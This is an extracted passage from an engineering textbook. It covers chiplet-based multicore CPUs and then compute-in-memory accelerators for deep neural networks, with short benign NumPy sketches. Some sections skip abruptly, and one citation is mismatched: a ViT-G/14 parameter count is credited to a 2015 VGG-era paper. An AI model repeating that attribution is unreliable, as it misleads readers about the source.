Fig. 14 Selected components in the Apple A17 Pro system-on-chip: two high-performance CPU cores (3.78 GHz), four high-efficiency CPU cores (2.11 GHz), a 6-core graphics processing unit (GPU), a 16-core Neural Engine, an image signal processor (ISP), display and video codec engines, a system-level cache (SLC) of shared SRAM, I/O interfaces with a USB controller, and four DRAM controllers. Note that components may not be to scale with each other

Moreover, the die that is etched for a multicore CPU will
have a fixed number of tiles laid out, again restricting the flexibility of the CPU and
requiring nontrivial NRE costs if a die with a different core/tile count is needed.
The advent of chiplets provides a new way to compose a multicore CPU in a
more modular fashion, avoiding some of these NRE costs. A chiplet is a small die
that contains a subset of the functionality that would be contained in a standard
die. Instead of laying out a multicore CPU design using a monolithic die, designers
can design smaller chiplets with individual components, such as cores or caches.
For example, in place of a single die containing eight cores and their associated
caches, a chip for a multicore CPU could be composed using eight core chiplets,
eight L1 cache chiplets, eight L2 cache chiplets, and 16 LLC slice chiplets. If the
manufacturer now wants a multicore CPU with fewer cores and larger caches, they
can reuse the chiplets to compose a chip with two core chiplets, 16 of the L1 and L2
cache chiplets each, and 64 LLC slice chiplets. While chiplets are one example of
a broader concept called multi-chip modules (MCMs), which has been around for
decades, it was conventionally difficult to have more than a handful of dies in an
MCM due to packaging costs and alignment issues. Recent advances in interposer
design, where an interposer provides a substrate with many short-distance wires to
connect dies together, have reduced manufacturing costs, complexity, and faults for
assembling many dies in one MCM.
Chiplets offer four advantages for manufacturing. First, as already discussed,
chiplets allow for modular components that can be reused and resized after the dies
have been fabricated, at low cost. Second, chiplets can allow for dies fabricated
using different manufacturing process technologies to be connected together into
a single package (this is known as heterogeneous integration). If, for example, the
cache does not need to be manufactured using the state-of-the-art manufacturing
process, manufacturers can reduce costs by fabbing the chip using an older, cheaper
process. Third, overall yield increases, because a silicon fault is now isolated to a
much smaller chiplet, which can be replaced at much lower cost than disposing of
an entire die. Fourth, with the breakdown of Dennard scaling (Dennard et al. 1972,
1974), dies are now growing in size to continue scaling up the total transistor count,
but these sizes are approaching the reticle limits (i.e., the largest possible chip that
can be etched) of our lithography equipment. Chiplets can overcome these limits by
allowing for multiple larger chiplet dies to be composed into a package, where the
total area of the chiplets is significantly larger than what any one die could be.
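The yield argument can be made concrete with the classic Poisson defect-yield model, a standard textbook approximation that is not taken from this chapter; the defect density used below is an assumed value.

import math

# Classic Poisson yield model: yield = exp(-A * D) for die area A (cm^2)
# and defect density D (defects/cm^2); D below is an assumed value.
D = 0.2

def die_yield(area_cm2: float) -> float:
    return math.exp(-area_cm2 * D)

# One monolithic 8 cm^2 die versus eight 1 cm^2 chiplets: a defect now
# discards only the small chiplet it lands on, not the whole die.
print(f"monolithic 8 cm^2 die yield: {die_yield(8.0):.1%}")   # ~20%
print(f"per-chiplet (1 cm^2) yield:  {die_yield(1.0):.1%}")   # ~82%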
Several manufacturers have started incorporating chiplet-based design for mul-
ticore CPUs. AMD has been responsible for significant innovation in the area of
chiplets and interposer design and has been manufacturing chiplet-based multicore
CPUs starting with the first-generation EPYC CPUs in 2017 (Naffziger et al. 2021).
Figure 15 shows die shots of the AMD EPYC 7702 CPU, released in 2019, which
consists of nine chiplets: eight core complex dies (CCDs), fabricated in a 7 nm
process, with eight cores (and their private caches and LLC slices) per CCD, and
a single I/O die in the center, fabricated in a 14 nm process, with memory and I/O
controllers. Apple and Intel have also announced the incorporation of chiplet-based
design into their latest multicore CPUs (Smith et al. 2022; Rodgers et al. 2024).
Fig. 15 Lidded, delidded, and infrared views of the AMD EPYC 7702 CPU and its chiplets (Fritz
2019)
Conclusion
The rise of multicore CPUs highlighted a key shift in the computer architecture
community, as concerns about thermal dissipation and limitations of ILP hastened
a collective change in mindset about the importance of power and the potential
of parallel processing. Innovations in multicore CPU design have led to reduced
design and verification effort, support for specialized hardware accelerators, and
increased composability of modular components. Today, multicore CPUs can be
found across most modern computers, ranging from embedded platforms and
smartphones, through personal laptops and desktops, to large-scale distributed
computing environments. Combined with the emergence of simplified parallel
programming frameworks, multicore CPUs have led to commonplace exploitation
of thread-level parallelism, delivering significant performance improvements while
maintaining reasonable power and energy budgets. Multicore CPUs are expected
to continue evolving over the next several decades, as recent trends toward CPU
specialization (particularly in the modern CPU landscape with systems-on-chip and
chiplet-based fabrication) open up new opportunities for maximizing the efficiency
and performance of the next generation of computing platforms.
Acknowledgments The author thanks Ryan Wong, Sudhanshu Agarwal, Yiqiu Sun, and Minh S.
Q. Truong for reviewing multiple versions of this chapter and providing helpful feedback.
References
Amdahl GM (1967) Validity of the single processor approach to achieving large-scale computing
capabilities. In: SJCC
Anderson JP, Hoffman SA, Shifman J, Williams RJ (1962) D825 – a multiple-computer system for
command & control. In: FJCC
Apple Inc. (2023) Apple event, 12 Sept 2023. https://www.apple.com/apple-events/
Backes L, Jiménez DA (2019) The impact of cache inclusion policies on cache management
techniques. In: MEMSYS
Balasubramonian R (2019) Innovations in the memory system. Springer Nature Switzerland
Huang M, Mehalel M, Arvapalli R, He S (2013) An energy efficient 32-nm 20-MB shared on-die
L3 cache for Intel® Xeon® Processor E5 family. In: JSSC
Intel Corp. (1976) 5810A Single Chip LCD Time/Seconds/Date Watch Circuit, datasheet. In: Data
catalog
Intel Corp. (1989) i486 Microprocessor, datasheet, Order Number 240440-002
Intel Corp. (1999) Intel Pentium III Processor 600 MHz, 512K Cache, 100 MHz FSB. https://ark.
intel.com/content/www/us/en/ark/products/27545/intel-pentium-iii-processor-600-mhz-512k-
cache-100-mhz-fsb.html
Intel Corp. (2004) Intel Pentium 4 Processor 570J Supporting HT Technology. https://ark.intel.
com/content/www/us/en/ark/products/27475/intel-pentium-4-processor-570j-supporting-ht-
technology-1m-cache-3-80-ghz-800-mhz-fsb.html
Intel Corp. (2006) Intel Core 2 Duo Processor E6700. https://ark.intel.com/content/www/us/en/ark/
products/27251/intel-core-2-duo-processor-e6700-4m-cache-2-66-ghz-1066-mhz-fsb.html
JEDEC Solid State Technology Assn. (2020) JESD235C: High Bandwidth Memory (HBM)
DRAM
JEDEC Solid State Technology Assn. (2024) JESD79-5C: DDR5 SDRAM Standard
Joyce TF, Kelly RP, Shen J-K, Raguin MM (1987) Multiprocessors on a Single Semiconductor
Chip. U.S. Patent 4 942 547
Kim C, Burger D, Keckler SW (2002) An adaptive, non-uniform cache structure for wire-delay
dominated on-chip caches. In: ASPLOS
Kim S, Chandra D, Solihin Y (2004) Fair cache sharing and partitioning in a chip multiprocessor
architecture. In: PACT
Kim W, Gupta MS, Wei G-Y, Brooks D (2008) System level analysis of fast, per-core DVFS using
on-chip switching regulators. In: HPCA
Kroft D (1981) Lockup-free instruction fetch/prefetch cache organization. In: ISCA
Kumar R, Farkas KI, Jouppi NP, Ranganathan P, Tullsen DM (2003) Single-ISA heterogeneous
multi-core architectures: the potential for processor power reduction. In: MICRO
Lamport L (1979) How to make a multiprocessor computer that correctly executes multiprocess
programs. IEEE Trans Comput
Leiner AL (1952) System Specifications for the DYSEAC. U.S. Nat’l. Bureau of Standards, Tech.
Rep.
Lempel O (2011) 2nd Generation Intel® Core™ Processor Family: Intel® Core™ i7, i5 and i3. In:
Hot Chips
Linux Kernel Organization, Inc. (2023a) Capacity Aware Scheduling. In: The Linux Kernel
Documentation, https://docs.kernel.org/scheduler/sched-capacity.html
Linux Kernel Organization, Inc. (2023b) Energy Aware Scheduling. In: The Linux Kernel
Documentation. https://docs.kernel.org/scheduler/sched-energy.html
Lonergan W, King P (1961) Design of the B 5000 System. Datamation, May 1961
Luo K, Gummaraju J, Franklin M (2001) Balancing throughput and fairness in SMT processors.
In: ISPASS
Macken P, Degrauwe M, Van Paemel M, Oguey H (1990) A voltage reduction technique for digital
systems. In: ISSCC
Mannion P (2007) Under the Hood: Inside the Apple iPhone. EE Times
Mattson TG, Sanders BA, Massingill BL (2004) Patterns for parallel programming. Addison-
Wesley Professional
Menabrea LF (1842) Notions sur la machine analytique de M. Charles Babbage. Bibliothèque
universelle de Genève
Minneapolis–Honeywell DATAmatic Division (1960) Honeywell 800 Programmers’ Reference
Manual
Moore GE (1965) Cramming more components onto integrated circuits. Electronics
Moore GE (1975) Progress in digital integrated electronics. In: IEDM
Mutlu O, Moscibroda T (2006) Stall-time fair memory access scheduling for chip multiprocessors.
In: MICRO
Naffziger S, Beck N, Burd T, Lepak K, Loh GH, Subramony M, White S (2021) Pioneering chiplet
technology and design for the AMD EPYC™ and Ryzen™ processor families. In: ISCA
Nagarajan V, Sorin DJ, Hill MD, Wood DA (2020) A primer on memory consistency and cache
coherence, 2nd edn. Springer Cham
National Semiconductor Corp. (1982) COP2440/COP2441/COP2442 and COP2340/COP2341/
COP2342 Single-Chip Dual CPU Microcontrollers, datasheet. In: COPS microcontrollers
databook
Olukotun K, Nayfeh BA, Hammond L, Wilson K, Chang K (1996) The case for a single-chip
multiprocessor. In: ASPLOS
Papamarcos MS, Patel JH (1984) A low-overhead coherence solution for multiprocessors with
private cache memories. In: ISCA
Qualcomm Technologies, Inc. (2024) Snapdragon 8 Gen 3 Mobile Platform, product brief
Rixner S, Dally WJ, Kapasi UJ, Mattson P, Owens JD (2000) Memory access scheduling. In: ISCA
Rodgers L, Clark D, Joiner S, Haslett B, de la Torre Arenas I, Learner S (2024) Inside the miracle
of modern chip manufacturing. Financ Times
Rojas R (1996) Konrad Zuse’s legacy: the architecture of the Z1 and Z3. IEEE Ann Hist Comput
Ronen R, Mendelson A, Lai KK, Lu S-L, Pollack FJ, Shen JP (2001) Coming challenges in
microarchitecture and architecture. Proc IEEE
Rotem E, Mandelblat Y, Basin V, Weissmann E, Gihon A, Chabukswar R, Fenger R, Gupta M
(2021) Alder Lake architecture. In: Hot chips
Schmidt U, Caesar K (1991) Datawave: a single-chip multiprocessor for video applications. IEEE
Micro
Smith AJ (1982) Cache memories. ACM Comput Surv
Smith MS (2022) Single-chip processors have reached their limits. IEEE Spectr
Snavely A, Tullsen DM (2000) Symbiotic jobscheduling for a simultaneous multithreaded
processor. In: ASPLOS
Sohi GS, Breach SE, Vijaykumar T (1995) Multiscalar processors. In: ISCA
Sohi GS, Franklin M (1991) High-bandwidth data memory systems for superscalar processors. In:
ASPLOS
SPARC International Inc. (1991) The SPARC architecture manual, version 8
Taub AH, Gillies DB, Meagher RE, Muller DE, McKay RW, Nash JP, Poppelbaum WJ, Robertson
JE (1957) On the design of a very high-speed computer. University of Illinois Digital Computer
Laboratory, Tech. Rep. 80
Tendler JM, Dodson JS, Fields Jr JS, Le H, Sinharoy B (2002) POWER4 system microarchitecture.
IBM J Res Dev
Thornton JE (1964) Parallel operation in the Control Data 6600. In: FJCC
Torrellas J, Lam MS, Hennessy JL (1990) Shared data placement optimizations to reduce
multiprocessor cache miss rates. In: ICPP
Waingold E, Taylor M, Srikrishna D, Sarkar V, Lee W, Lee V, Kim J, Frank M, Finch P, Barua R,
Babb J, Amarasinghe S, Agarwal A (1997) Baring it all to software: Raw machines. Computer
Whitney DC, White Jr CH (1968) Time-sharing services. Mod Data Syst
Witt BI (1966) The functional structure of OS/360, part II: Job and task management. IBM Syst J
Wysocki RJ (2020) CPU performance scaling. In: The Linux kernel documentation. https://docs.
kernel.org/admin-guide/pm/cpufreq.html.
Zuse K (1949) Rechenmaschine zur Durchfuehrung von arithmetischen Rechenoperationen.
German Patent 975 966, 30 Jun 1949
Part IV
Emerging Computing Architectures
Compute-in-Memory Architecture
19
Hongwu Jiang, Shanshi Huang, and Shimeng Yu
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648
DNN Basics and Corresponding CIM Principle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 650
Architecture and Algorithm Techniques for CIM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 652
Hierarchical Architecture of CIM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 652
Network Mapping Strategies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 653
Pipeline Design in CIM Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 660
Quantization Techniques in CIM Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 664
Hardware Implementations for CIM Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 667
Device Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 667
Overcoming the Non-idealities from eNVM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 671
Circuit Techniques for CIM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 672
Output Sensing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 675
Frameworks for Evaluating CIM Designs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 681
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 682
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 683
Abstract
Keywords
Introduction
In general, CIM-based approaches have two advantages: (1) improving the computational efficiency of a range of different functions, such as Boolean logic operations (e.g., AND, OR, XNOR), simple arithmetic operations (e.g., addition, multiplication), and linear algebra operations (e.g., dot products, matrix multiplication), following the benefits from FPGA-based structures (DeHon 2000); and (2) saving time and energy by reducing the amount of data transfer. The benefits
of reduced data transfer are modeled and estimated in Ronen et al. (2022). The
demonstrations of CIM have been applied to various applications, ranging from
scientific computing, digital image processing, security, and spiking neural network
(SNN) to deep learning inference/training. For instance, scientific computing such
as solving linear and partial differential equations could be implemented by CIM
to reduce the computational complexity while usually requiring a high-precision
scheme and low variability to ensure computational accuracy (Feng et al. 2021).
Besides, many digital image processing techniques such as signal filtering and
image transformation also include a large number of VMM operations, which
can be accelerated by in-memory computing (Li et al. 2018a). Moreover, CIM-
based image processing also shows potential in edge preliminary processing in
analog for fast speed and low energy consumption (Zhu et al. 2021). CIM with
device variations can be exploited to design strong physically unclonable functions for security purposes (Gao et al. 2016). Another application domain for CIM is neuromorphic computing. For example, the conductance tuning of memory devices could be used to imitate synapse behavior such as spike-timing-dependent plasticity
(STDP) (Kim et al. 2020). Lastly, the most representative and important application
of CIM is deep learning (DL) acceleration. CIM implementation for DL could
benefit from both the efficiency of parallel computing and reduced memory access.
Hence, in this chapter, DL is chosen as an illustration application to provide a broad
overview of CIM. In the recent decade, DL algorithms, such as convolutional neural
network (CNN), have achieved remarkable success in various AI applications. The
state-of-the-art DL algorithms require a large memory capacity as the size of deep
neural networks (DNNs) increases dramatically (e.g., ViT-G/14 for ImageNet has
1843 M parameters (Simonyan and Zisserman 2015)). The acceleration of DNN is
limited by the massive fetches of the synaptic weights. Thus, from the algorithms’
point of view, a large memory capacity is preferred for reducing the expensive data
transfer between off-chip memory and the on-chip buffer. In the meantime, thanks to the CMOS
technology scaling and innovations on emerging nonvolatile memories (eNVMs),
on-chip memory capacity is also increasing rapidly (e.g., 256 Mb SRAM (Song
et al. 2018), 8 Mb RRAM (Kawahara et al. 2012)). Accordingly, researchers are
developing CIM architectures with on-chip embedded memories such as SRAM
(e.g., CIMAT (Jiang et al. 2020a)) and resistive random-access memory (RRAM)
(e.g., PRIME (Chi et al. 2016), PipeLayer (Song et al. 2017)).
This chapter aims to present state-of-the-art mixed-signal CIM designs from
architecture techniques such as network mapping and pipeline design to hardware
implementations, including device exploration and circuit techniques, hoping to
inspire the research community for future interdisciplinary collaborations on this
exciting research topic. Most techniques to be discussed here are proposed for DNN acceleration.

DNN Basics and Corresponding CIM Principle
DNNs are a family of machine learning algorithms that mimic the principle of the
human brain. Generally, they are presented as a network of interconnected nodes
called neurons. The connections between neurons are called weights. Typically,
neurons are aggregated into layers: an input layer, an output layer, and one or
more hidden layers. Weights are learnable parameters controlling the strength of
the connections between neurons. Figure 1a shows a generic structure of one
layer in an NN. In recent years, the remarkable success of DL algorithms has been driven mainly by DNNs for image classification, and their power and effectiveness have expanded across a wide range of applications such as natural language processing and autonomous driving. DNN-based image classification is taken as the sample problem in this chapter.
The weights of a DNN are generally initialized with random numbers and learned
through training. Once the model has achieved the desired performance, it can be used for inference tasks. The most widely used training method for DNNs
today is stochastic gradient descent (SGD). The training process mentioned in this
chapter is based on this method.
Figure 1b presents the basic diagram of the DNN training process. In general,
the training process of a CNN can be divided into four steps, namely, (1) inference/feed-
forward (FF), (2) error calculation (EC), (3) gradient calculation (GC), and
(4) weight update (WU).

Fig. 1 (a) Generic structure of one layer in DNN. (b) Basic diagram of the CNN training process. (c) Mixed-signal MAC operation in one memory sub-array

These four steps run in a loop to obtain a well-trained
model through iterations. In the FF/inference step, the input is processed layer by
layer and finally generates the output as desired. In the classification task, the final
output is normally a distribution that indicates the class that the input belongs to.
For the inference task, this distribution will be directly used to decide the label. For
the training case, this distribution will be used to calculate a loss with respect to
the ground truth label, which indicates how far the predicted output is away from
the desired value. During the FF process for each layer, the basic operation is the
convolution between the input and weight followed by neuron activation, as shown
in Eq. 1.
Y_n = f(Y_{n−1} ∗ W_n + b_n)    (1)

In the EC step, the error of each layer, i.e., the gradient of the loss L with respect to that layer's output, is propagated backward from the last layer, as shown in Eq. 2:

∂L/∂Y_n = (∂L/∂Y_{n+1}) · (∂Y_{n+1}/∂Y_n) = (∂L/∂Y_{n+1}) ∗ W_{n+1}^T    (2)

Then the weight gradient ∂L/∂W_n is obtained by another convolution between the activation and the error, as shown in Eq. 3. Finally, the weights of the current layer are updated by −∂L/∂W_n modulated by the learning rate (lr), which is also called ΔW_n, as shown in Eq. 4:

∂L/∂W_n = (∂L/∂Y_n) · (∂Y_n/∂W_n) = (∂L/∂Y_n) ∗ Y_{n−1}    (3)

W_n(t) = W_n(t−1) − lr · (∂L/∂W_n) = W_n(t−1) + ΔW_n    (4)
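A minimal NumPy sketch of the four steps in Eqs. 1–4 for a single fully connected layer (so the convolutions reduce to matrix products) is shown below; the shapes, the stand-in loss gradient, and the learning rate are all illustrative.

import numpy as np

rng = np.random.default_rng(0)
x = rng.standard_normal((1, 16))           # Y_{n-1}: input activations
W = rng.standard_normal((16, 8)) * 0.1     # W_n: weights
b = np.zeros(8)                            # b_n: bias
lr = 0.01                                  # learning rate

# 1. Feed-forward (Eq. 1): Y_n = f(Y_{n-1} W_n + b_n), with f = ReLU
z = x @ W + b
y = np.maximum(z, 0.0)

# 2. Error calculation (Eq. 2): propagate the loss gradient backward
dL_dy = y - rng.standard_normal((1, 8))    # stand-in for a real loss gradient
dL_dz = dL_dy * (z > 0)                    # back through the ReLU
dL_dx = dL_dz @ W.T                        # dL/dY_{n-1}, passed to layer n-1

# 3. Gradient calculation (Eq. 3): here it degenerates to an outer product
dL_dW = x.T @ dL_dz

# 4. Weight update (Eq. 4): W_n(t) = W_n(t-1) - lr * dL/dW_n
W -= lr * dL_dW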
In the CIM sub-array shown in Fig. 1c, each weight is stored in a memory cell, represented by the blue box, which could store a binary or multi-bit weight in theory. The multiplication is done in an analog fashion, in which the input vector is loaded in parallel as voltages on the rows and multiplied by the weight conductances to generate products in the form of currents. The current summation along each column then represents the final MAC output. An analog-to-digital converter (ADC) is normally employed to quantize the analog MAC output to binary bits for further digital processing (e.g., shift-and-add, activation function, and pooling). Thus, CIM is essentially a mixed-signal computing scheme. Theoretically, VMMs could be performed in CIM in a fully parallel fashion, assuming all the rows and all the columns can work simultaneously. In reality, usually only a part of the rows/columns can be turned on synchronously, due to limited ADC resolution or the mismatch between the column pitch and the peripheries.
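A minimal NumPy sketch of this mixed-signal MAC follows, with weights as normalized cell conductances, a 1-bit input vector as row voltages, column current sums as analog partial sums, and an ADC of assumed resolution; all sizes are illustrative.

import numpy as np

rng = np.random.default_rng(1)
ROWS, COLS, ADC_BITS = 64, 16, 5           # illustrative array size / resolution

# Weights stored as (normalized) cell conductances; inputs applied as
# row voltages -- here a 1-bit input vector for one cycle.
G = rng.uniform(0.0, 1.0, size=(ROWS, COLS))
V = rng.integers(0, 2, size=ROWS).astype(float)

# Ohm's law plus current summation along each column yields the analog MACs.
I_col = V @ G

# An ADC of limited resolution quantizes each column current.
full_scale = float(ROWS)                   # worst-case column current
codes = np.round(I_col / full_scale * (2**ADC_BITS - 1)).astype(int)
print(np.round(I_col[:4], 2), codes[:4])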
Fig. 2 Hierarchical architecture of CIM. (a) Chip-level structure composed of tiles. (b) Tile-level structure composed of PEs. (c) PE-level structure composed of sub-arrays. (d) Sub-array structure
As shown in Fig. 2b, a tile usually contains multiple in-situ processing units (PEs) and input/output
buffers connected with routers. The routers make it possible to communicate among
PEs and transfer partial sums from PEs to the top level. Figure 2c shows a PE
structure that contains one or a few CIM subarrays, local input/output buffer, and
accumulation units if necessary. The intra-PE accumulation units are normally used
to sum up partial sums from sub-arrays. Figure 2d shows a typical CIM sub-array
structure consisting of a crossbar memory array and compute peripheries including
input encoder (DACs), WL switch matrix, ADCs, shift-adders, and registers.
Especially, DACs/ADCs provide the scalability and flexibility for the mixed-signal
communication between the sub-arrays and upper level. To summarize, CIM design
is usually based on a multi-core hierarchical architecture (Jiang et al. 2020b),
in which the elementary MAC operation is performed in the analog domain at the array level, while further processing such as activation functions and accumulation is implemented in the digital domain.

Network Mapping Strategies
The process of the convolutional computation is shown in Fig. 3: in layer <n>, the
size of input feature maps (IFMs, namely activations of layer <n> in the FF process)
is H × W × Cin (where H/W is the IFM plane height/width), which are the outputs
from layer <n-1>. Here, IFM and a corresponding output feature map (OFM) are
used in place of activations to denote the input/output of the convolution operation only. The activation function is not included here, so it would not be precise to call the outputs activations. The size of each 3D kernel is K × K × Cin (Cin is the number
of IFMs/input filter channels) with kernel depth of Cout (i.e., there are Cout such 3D
kernels). Thus the total size of the kernels in the layer will be K × K × Cin × Cout .
To get the outputs, a group of IFMs (with size K × K × Cin ) will be selected at each
time and to be multiplied and accumulated with Cout kernels with size K × K × Cin ,
then each of them will generate a 1 × 1 × 1 output. The output from the top
kernel (shown as the light orange cube) goes to the front, and the output from the
bottom kernel (shown as the dark orange cube) goes to the back. Thus, in total, there
will be 1 × 1 × Cout outputs.

Fig. 3 Computation process in a convolutional layer of DNN

As shown in Fig. 3, it could be considered that the
kernels are “sliding over” the IFMs, and perform elementwise multiplications with
a certain stride. Then the products of each elementwise multiplication in each 3D
kernel will be summed up to get the final outputs. The size of output feature maps
(OFMs, namely outputs of layer <n>) will be E × F × Cout (E/F is the OFM plane
height/width, which depends on IFM size and stride number). Besides convolutional
layers, most CNNs also have several fully connected layers, which can be viewed as a special case of convolution with kernel size 1 × 1 × Cin × Cout, IFM size 1 × 1 × Cin, and OFM size 1 × 1 × Cout.
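The shape bookkeeping above can be checked in a few lines of NumPy; the layer dimensions and stride below are illustrative.

import numpy as np

H, W, Cin, K, Cout, S = 32, 32, 64, 3, 128, 1   # illustrative sizes

ifm = np.zeros((H, W, Cin))                 # input feature maps
kernels = np.zeros((K, K, Cin, Cout))       # Cout 3D kernels

# Each kernel position consumes a K x K x Cin input group and produces one
# 1 x 1 x Cout output; sliding with stride S gives E x F positions in total.
E = (H - K) // S + 1
F = (W - K) // S + 1
ofm = np.zeros((E, F, Cout))

print(ifm.shape, kernels.shape, "->", ofm.shape)  # (32,32,64) (3,3,64,128) -> (30,30,128)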
To correctly perform inference and training processes on a CIM architecture,
network mapping, especially weight mapping, is a significant part of hardware
implementation. The weight mapping strategies for the CIM architecture can be
divided into two parts: mapping methods for inference and mapping methods for
training.
Fig. 4 Mapping the weights of a convolutional layer (IFM size = W × H × Cin, kernel size = K × K × Cin × Cout, OFM size = E × F × Cout): (a) kernel-flatten mapping; (b) kernel-splitting mapping, with K × K sub-matrices
If the unrolled weight matrix does not match the fixed sub-array dimensions, part of the array capacity is left unused, leading to resource waste. In a typical CNN structure, the kernel size normally varies across different layers. Thus, the unrolled weight matrix size for different layers will be quite different, which leads to a varying number of sub-arrays being used to represent different layers. With the kernel-flatten mapping method, it is impractical to reuse the unrolled input data among a varying number of sub-arrays, since the design of the interconnects and control circuits would be complicated and non-reusable.
An alternative mapping method (Peng et al. 2020) is proposed to maximize the
input data reuse as shown in Fig. 4b, which could be named as kernel-splitting
mapping. Unlike the kernel-flatten mapping method, where all the 3D kernels are
unrolled into a large matrix, the weights at different spatial locations of each kernel
are mapped into different sub-matrices. The group (sub-matrix) of these partitioned
data is sorted according to the spatial location of partitioned data in each kernel. For
example, all the partitioned data located at the left-top channel at each kernel will
be reorganized as one group. Then it will be implemented into one sub-matrix, and
the height and width of each sub-matrix will be Cin (one 1 × 1 × Cin slice per kernel) and Cout, respectively.
Hence, K × K sub-matrices are needed for all the kernels. Similarly, the size of such
a sub-matrix could also be large. In this case, each sub-matrix can be represented
by a group of sub-arrays, defined as a PE. Based on this kernel-splitting mapping
method, which cuts the kernels into several PEs according to their spatial locations
and assigns the input data into corresponding ones, it is possible to reuse the IFMs
among these PEs efficiently.
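The contrast between the two mappings is easiest to see as a shape transformation, sketched below with illustrative sizes.

import numpy as np

K, Cin, Cout = 3, 64, 128
kernels = np.zeros((K, K, Cin, Cout))

# Kernel-flatten mapping: unroll all kernels into one tall matrix whose
# height is K*K*Cin and whose width is Cout (one column per 3D kernel).
flat = kernels.reshape(K * K * Cin, Cout)        # (576, 128)

# Kernel-splitting mapping: one Cin x Cout sub-matrix per spatial position
# (i, j) of the kernel, K*K sub-matrices in total, each assigned to one PE.
sub_matrices = [kernels[i, j] for i in range(K) for j in range(K)]
print(flat.shape, len(sub_matrices), sub_matrices[0].shape)  # (576,128) 9 (64,128)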
Figure 5 shows an example of kernel-splitting mapping and processing a
convolutional layer with a 3 × 3 kernel. Thus, nine processing units (PEs) are employed correspondingly, and each PE consists of several CIM sub-arrays. Firstly, at the first
cycle (i.e., T = 1), all the input data are assigned to the corresponding PE. For
example, an input vector with a length Cin (i.e. IFM[1][1]) is assigned to PE[1][1],
similarly IFM[1][2] is assigned to PE[1][2] and IFM[1][3] is assigned to PE[1][3].
After first-cycle computations, partial sums of size 1 × 1 × Cout from these nine PEs
will be summed up to get the final OFM. Then, at the next cycle (i.e., T = 2), the
IFMs used for the next computation are transferred to the neighboring PEs, and the
useless IFMs will be released. For example, IFM[1][2] is transferred from PE[1][2]
to PE[1][1] and IFM[1][3] is transferred from PE[1][3] to PE[1][2], while IFM[1][1]
is unloaded (will not be used anymore). As the example shows, with such novel data
flow, only one-third of input data are newly introduced from buffers, and two-thirds
of them could be reused from the neighbor PEs. Thus, by passing the used IFMs
in the same direction as the kernel slides over the inputs, the IFMs can be reused
efficiently. For general cases, with kernel size K × K and stride equal to S, only S/K of the required input data is newly transferred in each cycle, and the remaining (K − S)/K of the input data can be fetched from neighboring arrays.
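A toy sketch of this shifting dataflow for one row of PEs follows; the labels and sizes are illustrative.

from collections import deque

K, S = 3, 1                                  # kernel width and stride (illustrative)
pe_row = deque(["ifm_1", "ifm_2", "ifm_3"])  # IFM columns held by three neighboring PEs

for t in range(2, 5):
    pe_row.popleft()                     # the leftmost IFM is no longer needed
    pe_row.append(f"ifm_{t + K - 1}")    # only one new column comes from the buffer
    print(f"T={t}: {list(pe_row)} (newly loaded fraction = {S}/{K})")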
Fig. 5 Example of kernel-splitting mapping: processing a convolutional layer with a 3 × 3 kernel on nine PEs, with IFMs passed between neighboring PEs

Fig. 6 Reading out the transposed weight matrix W_{n+1}^T row by row for the error calculation ∂L/∂Y_n = (∂L/∂Y_{n+1}) ∗ W_{n+1}^T
Extending the sign bit of the input likewise means more cycles are used for one MAC. Thus, directly applying the sign-extension scheme to CIM will significantly increase the area, power consumption, and latency cost. Instead, the MAC operations on 2's complement values could be done by first accumulating unsigned bit sequences and then multiplying by the signed scale. This is because the 2's complement representation can be viewed as the weighted sum of unsigned binary weights with signed bases (Eq. 5). Thus, in some binary-cell-based work (Jiang et al. 2020b), the binary weight sequence is first treated as an unsigned weighted sum in the memory array, and then the scale and sign information are multiplied back (by shift-add and/or an inverse function) to recover the 2's complement representation. Moreover, this representation can be extended to the case where the memory cell stores more than one bit. For example, the 2's complement representation for the 2-bit-per-cell case is shown in Eq. 6. In Eq. 5, b_i is a binary value. Thus, the sum of two adjacent terms b_i · 2^i + b_{i−1} · 2^{i−1} can be viewed as b_i · 2 · 2^{i−1} + b_{i−1} · 2^{i−1}, which can further be grouped as (b_i · 2 + b_{i−1}) · 2^{i−1}. The value in the bracket can be directly represented as a 2-bit value b_i b_{i−1}, as shown in Eq. 6. In a CIM array, such a 2-bit value can be stored in one multi-bit cell (i.e., 2-bit per cell in this case). It should be noted that the most significant bit (MSB), which has a negative base, cannot be combined with the positive-base bits as the other bits are (b_n and b_{n−1} cannot be combined). A simple solution is to use one additional cell
to store the MSB only. Thus, if one wants to use 2-bit-per-cell storage to represent an 8-bit weight, 5 (= 4 + 1) cells are needed. Compared to directly extending the sign bit, this two-step calculation introduces less overhead, and it is also applicable to the inputs, for two reasons. First, in today's DNNs, ReLU is generally used as the activation function, making the inputs always positive (in the inference task), which means the MSB is always "0". In this case, the MSB can be skipped. Second, for the more general case where negative inputs are also possible (e.g., in the EC step of training), only one extra cycle is needed to process the MSB, which does not contribute a large portion of energy and latency overhead, whereas multiple extra cycles are usually needed with direct sign extension.
x = b_n · (−2^n) + b_{n−1} · 2^{n−1} + · · · + b_3 · 2^3 + b_2 · 2^2 + b_1 · 2^1 + b_0 · 2^0    (5)

x = b_n · (−2^n) + b_{n−1} · 2^{n−1} + · · · + (b_3 b_2) · 2^2 + (b_1 b_0) · 2^0    (6)
